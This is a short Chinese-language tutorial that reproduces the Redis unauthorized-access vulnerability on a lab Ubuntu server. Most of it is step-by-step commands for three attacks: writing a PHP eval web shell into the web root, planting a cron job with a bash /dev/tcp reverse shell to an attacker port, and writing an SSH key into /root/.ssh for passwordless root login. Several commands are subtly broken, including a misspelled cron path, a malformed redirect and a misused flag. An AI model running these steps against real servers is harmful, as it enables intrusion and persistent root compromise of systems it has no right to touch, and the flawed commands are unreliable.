漏洞成因
有些redis绑在0.0.0.0:6379,没有开启验证或者没有设置对未知ip来源进行限制以及默认的空密码就导致了redis默认访问
但是这个普遍的漏洞极可能造成后门植入getshell,也可能造成反弹shell权限维持,甚至会造成ssh直接免密连接服务器
开始复现
搭建环境
服务器操作系统为ubuntu,ip为192.168.58.129
sudo apt update sudo apt install redis-server sudo systemctl status redis-server sudo vim /etc/redis/redis.conf 将 bind 127.0.0.1 ::1 注释掉 # bind 127.0.0.1 ::1 将 protected-mode 改成 no protected-mode no 保存配置文件 重启Redis服务器 使其生效 sudo systemctl restart redis-server
后面植入getshell
前提条件要知道网站的绝对路径和开启了web服务
使用kali进行远程连接,使用redis-cli
redis-cli -p ip 未授权连接redis
config get dir 获取redis的备份文件
config set dir /var/www/html 设置路径为网站路径
config set dbfilename shell.php 设置文件名 set x "<?php eval($_POST['shell']);?>" 给文件写入shell
设置定时任务定时反弹权限维持
1.redis-cli -h ip 2.config set dir /var/spool/corn 设置路径为定时任务路径 3.set x “\n***** bash -i >& /dev/tcp ip/5555 0>&\n” 设置定时任务,反弹到5555端口 4.save 5.攻击机监听5555端口
写入ssh公钥远程连接
1.ssh-keygen -t rsa 生成ssh公钥 2.redis-cli -h ip redis未授权连接 3.redis-cli ip 连接服务器 4.config getdir 获取redis备份路径 5.config set dir /root/.ssh 设置备份路径为ssh公钥存放目录 6.config set dbfilename xx 设置上传公钥备份文件名为 7.cat /key.txt | redis_cli -h ip -x set pub 将公钥写入redis缓冲 8.ssh -i id_rsa root@ip 免密登录